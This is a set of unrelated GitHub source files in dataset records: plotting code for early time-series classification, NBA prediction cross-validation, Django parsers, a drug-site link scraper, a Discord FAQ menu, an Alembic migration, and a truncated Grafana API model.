+{"seq_id":"22856981992","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport shutil\nsns.set_style(\"white\")\n\nimport numpy as np\n\nPLOTS_PATH = \"png\"\nDATA_PATH = \"csv\"\n\ndef calc_loss(accuracy ,earliness ,alpha):\n return alpha * accuracy + (1 - alpha) * (earliness)\n\ndef plot(df_a, col_a, df_b, col_b, xlabel=\"\", ylabel=\"\", title=\"\",\n fig=None, ax=None, textalpha=1, errcol=None, diagonal=True, hue=None, cbar_label=\"\"):\n\n if df_a.equals(df_b):\n concated = df_a\n else:\n concated = pd.concat([df_a, df_b], axis=1, join='inner')\n\n if hue is not None:\n hue.name = \"color\"\n hue.index.names = ['dataset']\n concated[\"color\"] = hue\n\n # features in consistent sequence to datasets\n hue = concated[\"color\"]\n\n X = concated[col_a]\n Y = concated[col_b]\n if errcol is not None:\n err = concated[errcol]\n else:\n err = None\n text = df_a.index\n\n if fig is None:\n fig, ax = plt.subplots(figsize=(16, 8))\n\n sns.despine(fig, offset=5)\n\n if err is None:\n sc = ax.scatter(X, Y, c=hue)\n\n if hue is not None:\n cbar = plt.colorbar(sc)\n cbar.set_label(cbar_label, rotation=270)\n else:\n ax.errorbar(X, Y, xerr=err, fmt='o', alpha=0.5)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.set_xlim(0, 1.1)\n ax.set_ylim(0, 1.1)\n ax.set_title(title)\n\n if diagonal:\n # diagonal line\n ax.plot([0, 1], [0, 1])\n ax.grid()\n\n xy = pd.concat([X, Y], axis=1)\n xy.columns = [\"X\", \"Y\"]\n\n for row in xy.iterrows():\n txt, (xval, yval) = row\n ax.annotate(txt, (xval + 0.01, yval + 0.01), fontsize=12, alpha=textalpha)\n\n return fig, ax\n\ndef load_mori(alpha, mori_accuracy, mori_earliness):\n A = pd.read_csv(mori_accuracy, sep=' ').set_index(\"Dataset\")\n E = pd.read_csv(mori_earliness, sep=' ').set_index(\"Dataset\") * 0.01\n return A[\"a={}\".format(alpha)], E[\"a={}\".format(alpha)]\n\ndef load_relclass(alpha, relclass_accuracy, relclass_earliness):\n\n if alpha == 0.6:\n column = \"t=0.001\"\n elif alpha == 0.7:\n column = \"t=0.1\"\n elif alpha == 0.8:\n column = \"t=0.5\"\n elif alpha == 0.9:\n column = \"t=0.9\"\n else:\n raise ValueError()\n\n accuracy = pd.read_csv(relclass_accuracy, sep=' ').set_index(\"Dataset\")[column] # accuracy is scaled 0-1\n earliness = pd.read_csv(relclass_earliness, sep=' ').set_index(\"Dataset\")[\n column] * 0.01 # earliness is scaled 1-100\n return accuracy, earliness\n\ndef plot_accuracyearliness_sota_experiment(ptsepsilon=10,\n entropy_factor=0.01,\n compare=\"mori\",\n csvfile = \"data/sota_comparison/runs.csv\",\n metafile=\"data/UCR_Datasets/DataSummary.csv\",\n mori_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\",\n mori_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\",\n relclass_accuracy=\"data/morietal2017/relclass-accuracy-gaussian-quadratic-set.csv\",\n relclass_earliness=\"data/morietal2017/relclass-earliness-gaussian-quadratic-set.csv\"):\n df = pd.read_csv(csvfile)\n\n meta = pd.read_csv(metafile).set_index(\"Name\")\n\n for alpha in [0.6, 0.7, 0.8, 0.9]:\n data = df.loc[df[\"earliness_factor\"] == alpha].set_index(\"dataset\")\n data = data.loc[data[\"ptsepsilon\"] == ptsepsilon]\n data = data.loc[data[\"entropy_factor\"] == entropy_factor]\n\n if len(data) == 0:\n print(\"No runs found for a{} b{} e{}... 
skipping\".format(alpha, entropy_factor, ptsepsilon))\n continue\n\n cost = calc_loss(data[\"accuracy\"],1-data[\"earliness\"],alpha)\n\n # average multiple runs\n data[\"ours\"] = cost.groupby(cost.index).mean()\n #load_approaches\n\n\n\n #df = load_approaches(alpha=0.6,relclass_col=\"t=0.001\",edsc_col=\"t=2.5\",ects_col=\"sup=0.05\")\n if compare==\"relclass\":\n accuracy, earliness = load_relclass(alpha, relclass_accuracy, relclass_earliness)\n elif compare==\"mori\":\n accuracy, earliness = load_mori(alpha, mori_accuracy, mori_earliness)\n\n data[\"mori\"] = calc_loss(accuracy,1-earliness,alpha)\n\n fig, ax = plot(data, \"ours\", data, \"mori\", xlabel=\"accuracy and earliness Ours (Phase 2)\",\n ylabel=compare + r\"SR2-CF2$\", hue=np.log10(meta[\"Train\"]),\n cbar_label=\"log # training samples\",\n title=r\"accuracy and earliness $\\alpha={}$\".format(alpha))\n\n fname = os.path.join(PLOTS_PATH,compare, \"sota_{}_a{}_b{}_e{}.png\".format(\"accuracyearliness\", alpha, entropy_factor, ptsepsilon))\n os.makedirs(os.path.dirname(fname),exist_ok=True)\n print(\"writing \" + fname)\n fig.savefig(fname)\n plt.clf()\n\n fname = os.path.join(DATA_PATH, compare,\"accuracyearliness_alpha{}.csv\".format(alpha))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n print(\"writing \" + fname)\n data[[\"ours\", \"mori\"]].to_csv(fname)\n\ndef plot_accuracy_sota_experiment(ptsepsilon=10,\n entropy_factor=0.01,\n compare=\"mori\",\n csvfile = \"data/sota_comparison/runs.csv\",\n metafile=\"data/UCR_Datasets/DataSummary.csv\",\n mori_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\",\n mori_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\",\n relclass_accuracy=\"data/morietal2017/relclass-accuracy-gaussian-quadratic-set.csv\",\n relclass_earliness=\"data/morietal2017/relclass-earliness-gaussian-quadratic-set.csv\"):\n\n data = pd.read_csv(csvfile).set_index(\"dataset\")\n data = data.loc[data[\"ptsepsilon\"] == ptsepsilon]\n data = data.loc[data[\"entropy_factor\"] == entropy_factor]\n\n meta = pd.read_csv(metafile).set_index(\"Name\")\n\n\n for alpha in [0.6, 0.7, 0.8, 0.9]:\n df = data.loc[data[\"earliness_factor\"] == alpha]\n\n summary = pd.DataFrame()\n for objective in [\"accuracy\", \"earliness\"]:\n\n ours = df.loc[df[\"earliness_factor\"]==alpha]\n if len(ours) == 0:\n print(\"No runs found for a{} b{} e{}... 
skipping\".format(alpha, entropy_factor, ptsepsilon))\n continue\n\n if compare == \"relclass\":\n accuracy, earliness = load_relclass(alpha, relclass_accuracy, relclass_earliness)\n elif compare == \"mori\":\n accuracy, earliness = load_mori(alpha, mori_accuracy, mori_earliness)\n\n other = pd.DataFrame()\n if objective == \"accuracy\":\n ours[\"accuracy\"] = ours[\"accuracy\"]\n other[\"a={}\".format(alpha)] = accuracy\n summary[\"ours\"] = ours[\"accuracy\"]\n summary[\"mori\"] = accuracy\n\n elif objective == \"earliness\":\n other[\"a={}\".format(alpha)] = earliness\n ours[\"earliness\"] = ours[\"earliness\"]\n summary[\"mori\"] = other\n\n fig, ax = plot(ours, objective, other, \"a={}\".format(alpha), xlabel=objective+\" Ours (Phase 2)\",\n ylabel=compare + r\" SR2-CF2$\", title=objective + r\" $\\alpha={}$\".format(alpha),\n hue=np.log10(meta[\"Train\"]), cbar_label=\"log # training samples\")\n\n fname = os.path.join(PLOTS_PATH, compare, \"sota_{}_a{}_b{}_e{}.png\".format(objective,alpha, entropy_factor, ptsepsilon))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n print(\"writing \" + fname)\n fig.savefig(fname)\n plt.clf()\n\n fname = os.path.join(DATA_PATH,compare,\"{}_alpha{}.csv\".format(objective,alpha))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n print(\"writing \" + fname)\n summary[[\"ours\", \"mori\"]].to_csv(fname)\n\n\ndef qualitative_figure(csvfile = \"data/sota_comparison/runs.csv\", compare_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\", compare_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\"):\n\n df = pd.read_csv(csvfile)\n df = df.loc[df.entropy_factor == 0]\n df = df.loc[df.ptsepsilon == 0]\n\n\n mori_accuracy = pd.read_csv(compare_accuracy, sep=' ').set_index(\"Dataset\")\n mori_earliness = pd.read_csv(compare_earliness, sep=' ').set_index(\"Dataset\")\n\n all_datasets = df[\"dataset\"].unique()\n #selected_datasets = [\"TwoPatterns\", \"Yoga\", \"Adiac\", \"UWaveGestureLibraryY\", \"FaceAll\"]\n selected_datasets = all_datasets\n\n mori = pd.DataFrame()\n for dataset in selected_datasets:\n\n fig, ax = plt.subplots(figsize=(30, 16))\n\n mori[\"accuracy\"] = mori_accuracy.loc[dataset]\n mori[\"earliness\"] = mori_earliness.loc[dataset] * 0.01\n ax.plot(mori[\"accuracy\"], mori[\"earliness\"], linestyle='--', marker='+')\n\n #df3 = df3[~df3.index.duplicated(keep='first')]\n sample = df.loc[df[\"dataset\"] == dataset].sort_values(by=\"earliness_factor\")\n sample = sample.groupby(\"earliness_factor\").mean()\n ax.plot(sample[\"accuracy\"], sample[\"earliness\"], linestyle='--', marker='o')\n ax.set_xlabel(\"accuracy\")\n ax.set_ylabel(\"earliness\")\n #\n\n X = sample[\"accuracy\"].iloc[0]\n Y = sample[\"earliness\"].iloc[0]\n ax.annotate(\"our \" + dataset, xy=(X, Y), xytext=(X, Y))\n\n X = mori[\"accuracy\"].iloc[0]\n Y = mori[\"earliness\"].iloc[0]\n ax.annotate(dataset, xy=(X, Y), xytext=(X, Y))\n\n fname = DATA_PATH + \"/alphas_our_{}.csv\".format(dataset)\n print(\"writing \" + fname)\n sample.to_csv(fname)\n\n fname = DATA_PATH + \"/alphas_mori_{}.csv\".format(dataset)\n print(\"writing \" + fname)\n mori.to_csv(fname)\n\n fname = os.path.join(PLOTS_PATH, \"earlinessaccuracy\", \"{}.png\".format(dataset))\n os.makedirs(os.path.dirname(fname),exist_ok=True)\n print(\"writing \" + fname)\n fig.savefig(fname)\n plt.clf()\n\ndef plot_scatter(csvfile=\"data/sota_comparison/runs.csv\",\n metafile=\"data/UCR_Datasets/DataSummary.csv\",\n mori_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\",\n 
mori_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\",\n relclass_accuracy=\"data/morietal2017/relclass-accuracy-gaussian-quadratic-set.csv\",\n relclass_earliness=\"data/morietal2017/relclass-earliness-gaussian-quadratic-set.csv\"):\n\n for compare in [\"mori\",\"relclass\"]:\n\n for ptsepsilon in [0,5,10,50]:\n for entropy_factor in [0,0.01, 0.1]:\n plot_accuracyearliness_sota_experiment(ptsepsilon=ptsepsilon,\n entropy_factor=entropy_factor,\n compare=compare,\n csvfile=csvfile,\n metafile=metafile,\n mori_accuracy=mori_accuracy,\n mori_earliness=mori_earliness,\n relclass_accuracy=relclass_accuracy,\n relclass_earliness=relclass_earliness)\n\n plot_accuracy_sota_experiment(ptsepsilon=ptsepsilon,\n entropy_factor=entropy_factor,\n compare=compare,\n csvfile=csvfile,\n metafile=metafile,\n mori_accuracy=mori_accuracy,\n mori_earliness=mori_earliness,\n relclass_accuracy=relclass_accuracy,\n relclass_earliness=relclass_earliness)\n\ndef cleanup():\n thisdir=os.path.dirname(os.path.realpath(__file__))\n\n if os.path.exists(os.path.join(thisdir, DATA_PATH)):\n print(\"deleting csv data in \"+os.path.join(thisdir, DATA_PATH))\n shutil.rmtree(os.path.join(thisdir, DATA_PATH))\n if os.path.exists(os.path.join(thisdir, PLOTS_PATH)):\n print(\"deleting png plots in \" + os.path.join(thisdir, PLOTS_PATH))\n shutil.rmtree(os.path.join(thisdir, PLOTS_PATH))\n\nif __name__==\"__main__\":\n cleanup()\n\n csvfile = \"../data/runs_conv1d.csv\"\n metafile = \"../data/UCR_Datasets/DataSummary.csv\"\n mori_accuracy = \"../data/UCR_Datasets/mori-accuracy-sr2-cf2.csv\"\n mori_earliness = \"../data/UCR_Datasets/mori-earliness-sr2-cf2.csv\"\n relclass_accuracy = \"../data/UCR_Datasets/relclass-accuracy-gaussian-quadratic-set.csv\"\n relclass_earliness = \"../data/UCR_Datasets/relclass-earliness-gaussian-quadratic-set.csv\"\n\n plot_scatter(csvfile, metafile, mori_accuracy, mori_earliness, relclass_accuracy, relclass_earliness)\n\n qualitative_figure(csvfile,\n compare_accuracy=mori_accuracy,\n compare_earliness=mori_earliness)\n\n","repo_name":"rtavenar/elects","sub_path":"viz/viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":13476,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"}
+{"seq_id":"18164591725","text":"import torch\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data import DataLoader, random_split\n\nfrom pytorch_lightning import LightningModule, Trainer, seed_everything\nfrom pytorch_lightning.loggers import CSVLogger\nfrom pytorch_lightning.callbacks import Callback, ModelCheckpoint, EarlyStopping\n\nimport torchmetrics\nfrom torchmetrics import Accuracy\n\nimport pandas as pd\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport _pickle\nimport os\n\nGPU_indx = 0\ndevice = torch.device(GPU_indx if torch.cuda.is_available() else 'cpu')\nprint('device: ', device)\n\n\n# In[ ]:\n\n\nfrom model import PlayerLevelCNN\nfrom dataset import NBAPlayerData\n\n\n# In[ ]:\n\n\nclass CustomCrossValidation(object):\n def __init__(self, df, i=10):\n self.seasons = ['22008', '22009', '22010', '22011', '22012', '22013', '22014',\n '22015', '22016', '22017', '22018', '22019', '22020', '22021', \n '22022']\n self.fold_slice = i\n \n self.df = df.copy()\n \n def _get_split(self, get_half):\n '''\n get half is for having observations that belong to the same season \n both in train and validation sets, thereby to reduce the impact of\n a possible domain shift\n '''\n train_set = self._get_train_set(get_half)\n valid_set = self._get_valid_set(get_half)\n return train_set, valid_set\n \n def _get_train_set(self, get_half=False):\n res = self.df[self.df['SEASON_ID'].isin(self.seasons[:self.fold_slice])]\n if get_half:\n next_season = self.df[self.df['SEASON_ID']==self.seasons[self.fold_slice]].reset_index(drop=True)\n res = pd.concat([res, next_season.iloc[:len(next_season)//2]])\n return res\n \n def _get_valid_set(self, get_half=False):\n res = self.df[self.df['SEASON_ID']==self.seasons[self.fold_slice]]\n if get_half:\n res = res.reset_index(drop=True).iloc[len(res)//2:]\n return res\n \n def _slide(self):\n if self.fold_slice + 1 < len(self.seasons):\n self.fold_slice += 1\n else:\n return True\n \n def _prepare_data_loaders(self, get_half):\n BATCH_SIZE = 256\n NUM_WORKERS = 0\n \n df_tr, df_val = self._get_split(get_half)\n print(f\"train set range {df_tr['GAME_DATE'].min()} - {df_tr['GAME_DATE'].max()}\")\n print(f\"valid set range {df_val['GAME_DATE'].min()} - {df_val['GAME_DATE'].max()}\")\n \n train_set = NBAPlayerData(df_tr, scaler='fit')\n train_loader = DataLoader(train_set, shuffle=True, batch_size=BATCH_SIZE, num_workers=NUM_WORKERS)\n\n val_set = NBAPlayerData(df_val, scaler=train_set.scaler)\n val_loader = DataLoader(val_set, shuffle=False, batch_size=BATCH_SIZE, num_workers=NUM_WORKERS)\n\n data_loaders = [train_loader, val_loader]\n return data_loaders\n \n def _fit_model(self, model_params, data_loaders):\n model = PlayerLevelCNN(model_id='trial_model', data_loaders=data_loaders, hyperparams=model_params, seed=30)\n \n checkpoint_callback = ModelCheckpoint(monitor=\"val_loss\",\n dirpath=\"cv_logs/\",\n save_top_k=1,\n mode=\"min\",\n every_n_epochs=1)\n\n early_stopping = EarlyStopping('val_loss', patience = 5, mode='min') \n\n trainer = Trainer(\n accelerator=\"auto\",\n devices=1 if torch.cuda.is_available() else None, \n max_epochs=5,\n callbacks=[checkpoint_callback, early_stopping],\n logger=CSVLogger(save_dir=\"cv_logs/\"),\n deterministic=True\n )\n trainer.fit(model)\n result = trainer.validate(model)\n return result, model\n \n def _predict_val_set(self, model, val_loader):\n predictions = {}\n \n val_loader_iter = iter(val_loader)\n for i in range(len(val_loader)):\n stats, momentum, odds, target, game_ids = 
next(val_loader_iter)\n batch_preds = model.predict_step(stats, momentum, odds, predict_label=True)\n predictions.update({'00'+str(int(game_ids[i])):bool(batch_preds[i]) for i in range(len(batch_preds))})\n \n return predictions\n\n def _get_updated_df(self):\n # update the duplicated game_ids\n keys_to_change = []\n for k, v in self.all_predictions.items():\n if len(k) > 10:\n keys_to_change.append(k)\n for k in keys_to_change:\n self.all_predictions[k[:-1] + '_2'] = self.all_predictions[k]\n self.all_predictions.pop(k)\n\n predicted_df = self.df.copy()\n predicted_df['cv_pred'] = predicted_df['GAME_ID'].map(self.all_predictions)\n predicted_df.dropna(subset='cv_pred', inplace=True)\n predicted_df = predicted_df[['GAME_ID', 'GAME_DATE', 'SEASON_ID', 'home_team',\n 'away_team', 'TEAM_A_WIN', 'cv_pred']]\n self.predicted_df = predicted_df\n \n def fit_predict(self, model_params, get_half):\n \n self.all_predictions = {}\n self.fold_scores = []\n j = 0\n while True:\n print(j)\n data_loaders = self._prepare_data_loaders(get_half)\n \n result, model = self._fit_model(model_params, data_loaders)\n self.fold_scores.append(result)\n \n predictions = self._predict_val_set(model, data_loaders[1])\n self.all_predictions.update(predictions)\n \n if self._slide():\n break\n j += 1\n print()\n \n self._get_updated_df()\n return self.predicted_df\n\n","repo_name":"utkuboyar/nba_match_outcome_prediction","sub_path":"pre_deployment/custom_cross_validation.py","file_name":"custom_cross_validation.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"3429648666","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n- service_vault.parsers\n~~~~~~~~~~~~~~~~~~~~~~~\n\n- This file contains Custom Parsers to render Response to clients\n\"\"\"\n\n# future\nfrom __future__ import unicode_literals\n\n# 3rd party\n\n# rest-framework\nfrom rest_framework.parsers import BaseParser\n\n# Django\n\n# local\n\n# own app\n\n\nclass HTMLParser(BaseParser):\n \"\"\"HTML parser.\n\n \"\"\"\n media_type = 'text/html'\n\n def parse(self, stream, media_type=None, parser_context=None):\n \"\"\"\n Simply return a string representing the body of the request.\n \"\"\"\n return stream.read()\n\n\nclass PlainTextParser(BaseParser):\n \"\"\"\n Plain text parser.\n \"\"\"\n media_type = 'text/plain'\n\n def parse(self, stream, media_type=None, parser_context=None):\n \"\"\"\n Simply return a string representing the body of the request.\n \"\"\"\n return stream.read()\n","repo_name":"veris-neerajdhiman/v-serviceVault","sub_path":"service_vault/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37959642677","text":"import requests\nfrom bs4 import BeautifulSoup as soup\nfrom datetime import datetime\nimport concurrent.futures\nimport time\nimport string\nimport pandas as pd\nimport logging as log\n\nheader = {'Origin': 'https://www.1mg.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'\n}\n\ndef clean_script(soup_obj):\n remove_tags = ['head','script','meta','style','blockquote']\n for x in soup_obj.findAll(remove_tags):\n x.decompose()\n return soup_obj\n\ndef call_scrapper(base_url,char):\n links = []\n index = 0\n while True:\n base_url_copy = base_url\n if index != 0 and char != 'a':\n base_url_copy += f'?page={index}&label={char}' \n elif index !=0 and char == 'a':\n base_url_copy += f'?page={index}'\n\n time.sleep(3)\n base_html = requests.get(url=base_url_copy,headers=header)\n\n # print(f\"Page: {index+1}\")\n if base_html.status_code == 200:\n base_bs_obj = soup(base_html.text,'html.parser')\n base_clean_obj = clean_script(base_bs_obj)\n temp = list() \n [temp.append(a['href']) for a in base_clean_obj.findAll('a',{'class':'button-text','target':'_blank'}) if 'drug' in a['href']]\n\n if temp:\n [links.append('https://www.1mg.com/drugs/'+x) for x in temp]\n else:\n print(\"----- No data available in page.... skipping to next search character -----\")\n break\n index += 1\n else:\n print(f\"---- Status code : {base_html.status_code} ----\")\n print(f\"\\n Error URL: {base_url}\")\n break\n return links\n\nif __name__ == \"__main__\":\n start = datetime.now()\n base_url = 'https://www.1mg.com/drugs-all-medicines'\n alpha = string.ascii_lowercase\n max_workers = 50\n\n response = list()\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n futures = {executor.submit(call_scrapper,base_url,char) for char in alpha}\n for future in concurrent.futures.as_completed(futures):\n response.append(future.result())\n \n final_links = list()\n if response:\n [[final_links.append(x) for x in lst] for lst in response if lst]\n \n df = pd.DataFrame({\"links\":final_links})\n df[\"links\"] = df[\"links\"].apply(lambda x:x.replace('https://www.1mg.com/drugs//','https://www.1mg.com/'))\n df.to_csv('data/med_card_links.csv',index=False)\n end = datetime.now()\n\n log.info(\" Time Taken: %s\",(end-start))","repo_name":"kaustavb79/1mg_drugs_scrapper","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26131255466","text":"from logging import getLogger\nfrom typing import Optional\n\nfrom discord import Interaction, SelectOption\nfrom discord.ui import Button, Select, View\nfrom mappings import mainoptions_mapping, suboption_mapping\nfrom topics import initial\n\nfrom classes.buttons import FSupportButton\nfrom classes.config import Config\n\nfrom .structure import CustomEmbed, Options # SubOptions\n\nlog = getLogger(__name__)\n\n\n# Defines the main dropdown select menu for the FAQ\nclass AlphaDropdown(Select):\n def __init__(self, custom_id: str = \"base_alphadropdown\") -> None:\n options = [\n SelectOption(\n label=article.label,\n description=article.description,\n emoji=article.emoji,\n value=str(article.id),\n )\n for article in initial.options\n ]\n options.append(\n SelectOption(\n label=\"I couldn't find what I'm looking for!\",\n value=Config().FURTHER_SUPPORT_ROLE,\n emoji=\"<:ICouldntFindWhatImLookingFor:995421072340037725>\",\n )\n )\n\n # The placeholder is what will be shown when no option is chosen\n # The min and max values indicate we can only pick one of the three options\n # The options parameter defines the dropdown options. We defined this above\n super().__init__(\n placeholder=\"Select a topic...\",\n min_values=1,\n max_values=1,\n options=options,\n custom_id=custom_id,\n )\n\n async def callback(self, interaction: Interaction) -> None:\n # Get the selected option and check if it's a request for further suppor, if it is send the confirmation and stop menu\n if self.values[0] == Config().FURTHER_SUPPORT_ROLE:\n await FSupportButton().callback(interaction)\n return\n\n # Figure out the corresponding article to their selection\n\n for key in mainoptions_mapping.keys():\n if float(self.values[0]) == key:\n menu = initial.options[int(key) - 1]\n\n embed = CustomEmbed(\n title=menu.label,\n description=f\"{menu.description}\\n\\n{menu.content}\",\n )\n\n # Figure out the sub-questions to display\n options_to_show = suboption_mapping.get(float(self.values[0]))\n\n # Adds each sub question to the select menu options\n next_options: list[SelectOption] = [\n SelectOption(\n label=question.label,\n emoji=question.emoji, # PartialEmoji.from_str() if question.emoji else None,\n )\n for question in options_to_show.options\n ]\n\n # Create a View object and generate the embed with the sub-questions\n view = View()\n view.add_item(BetaDropdown(options_to_show, next_options))\n\n for article in options_to_show.options:\n if float(self.values[0]) != initial.options[0].id:\n embed.add_field(\n name=article.label,\n value=article.description if article.description else \"\\u200b\",\n inline=False,\n )\n await interaction.response.send_message(embed=embed, view=view, ephemeral=True)\n\n\n# Defines the sub dropdown for the selected FAQ option\nclass BetaDropdown(Select):\n def __init__(\n self,\n sub_option: Optional[Options],\n options: list[SelectOption],\n ):\n self.sub_option = sub_option\n super().__init__(\n placeholder=\"Select a question...\",\n min_values=1,\n max_values=1,\n options=options,\n )\n\n async def callback(self, interaction: Interaction) -> None:\n embed = CustomEmbed(title=self.values[0])\n\n for question in self.sub_option.options:\n # Figure out which sub question was chosen and get the content (answer) of the question\n if question.label == self.values[0]: # .value\n embed.description = question.content\n\n if question.image:\n embed.set_image(url=question.image)\n\n view = View()\n if question.links:\n for link in question.links:\n 
view.add_item(\n Button(label=link.label, url=link.url, emoji=link.emoji)\n )\n view.add_item(FSupportButton())\n\n await interaction.response.send_message(embed=embed, ephemeral=True, view=view)\n","repo_name":"SnowyJaguar1034/ModMail-FAQ","sub_path":"classes/dropdowns.py","file_name":"dropdowns.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"74797573228","text":"\"\"\"follow table add/deletion\n\nRevision ID: 44f51f8b28a8\nRevises: 1d9caa4ab373\nCreate Date: 2021-12-23 14:22:10.075776\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '44f51f8b28a8'\ndown_revision = '1d9caa4ab373'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('follows',\n sa.Column('follower_id', sa.Integer(), nullable=False),\n sa.Column('following_id', sa.Integer(), nullable=False),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['following_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('follower_id', 'following_id')\n )\n op.drop_table('followers')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('followers',\n sa.Column('follower_id', sa.INTEGER(), nullable=True),\n sa.Column('followed_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )\n )\n op.drop_table('follows')\n # ### end Alembic commands ###\n","repo_name":"csulva/Card-Again","sub_path":"migrations/versions/44f51f8b28a8_follow_table_add_deletion.py","file_name":"44f51f8b28a8_follow_table_add_deletion.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"33746470616","text":"# coding: utf-8\n\n\"\"\"\n Grafana HTTP API.\n\n The Grafana backend exposes an HTTP API, the same API is used by the frontend to do everything from saving dashboards, creating users and updating data sources. # noqa: E501\n\n OpenAPI spec version: 0.0.1\n Contact: hello@grafana.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass OrgUserDTO(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'access_control': 'dict(str, bool)',\n 'avatar_url': 'str',\n 'email': 'str',\n 'last_seen_at': 'datetime',\n 'last_seen_at_age': 'str',\n 'login': 'str',\n 'name': 'str',\n 'org_id': 'int',\n 'role': 'str',\n 'user_id': 'int'\n }\n\n attribute_map = {\n 'access_control': 'accessControl',\n 'avatar_url': 'avatarUrl',\n 'email': 'email',\n 'last_seen_at': 'lastSeenAt',\n 'last_seen_at_age': 'lastSeenAtAge',\n 'login': 'login',\n 'name': 'name',\n 'org_id': 'orgId',\n 'role': 'role',\n 'user_id': 'userId'\n }\n\n def __init__(self, access_control=None, avatar_url=None, email=None, last_seen_at=None, last_seen_at_age=None, login=None, name=None, org_id=None, role=None, user_id=None, _configuration=None): # noqa: E501\n \"\"\"OrgUserDTO - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._access_control = None\n self._avatar_url = None\n self._email = None\n self._last_seen_at = None\n self._last_seen_at_age = None\n self._login = None\n self._name = None\n self._org_id = None\n self._role = None\n self._user_id = None\n self.discriminator = None\n\n if access_control is not None:\n self.access_control = access_control\n if avatar_url is not None:\n self.avatar_url = avatar_url\n if email is not None:\n self.email = email\n if last_seen_at is not None:\n self.last_seen_at = last_seen_at\n if last_seen_at_age is not None:\n self.last_seen_at_age = last_seen_at_age\n if login is not None:\n self.login = login\n if name is not None:\n self.name = name\n if org_id is not None:\n self.org_id = org_id\n if role is not None:\n self.role = role\n if user_id is not None:\n self.user_id = user_id\n\n @property\n def access_control(self):\n \"\"\"Gets the access_control of this OrgUserDTO. # noqa: E501\n\n\n :return: The access_control of this OrgUserDTO. # noqa: E501\n :rtype: dict(str, bool)\n \"\"\"\n return self._access_control\n\n @access_control.setter\n def access_control(self, access_control):\n \"\"\"Sets the access_control of this OrgUserDTO.\n\n\n :param access_control: The access_control of this OrgUserDTO. # noqa: E501\n :type: dict(str, bool)\n \"\"\"\n\n self._access_control = access_control\n\n @property\n def avatar_url(self):\n \"\"\"Gets the avatar_url of this OrgUserDTO. # noqa: E501\n\n\n :return: The avatar_url of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._avatar_url\n\n @avatar_url.setter\n def avatar_url(self, avatar_url):\n \"\"\"Sets the avatar_url of this OrgUserDTO.\n\n\n :param avatar_url: The avatar_url of this OrgUserDTO. 
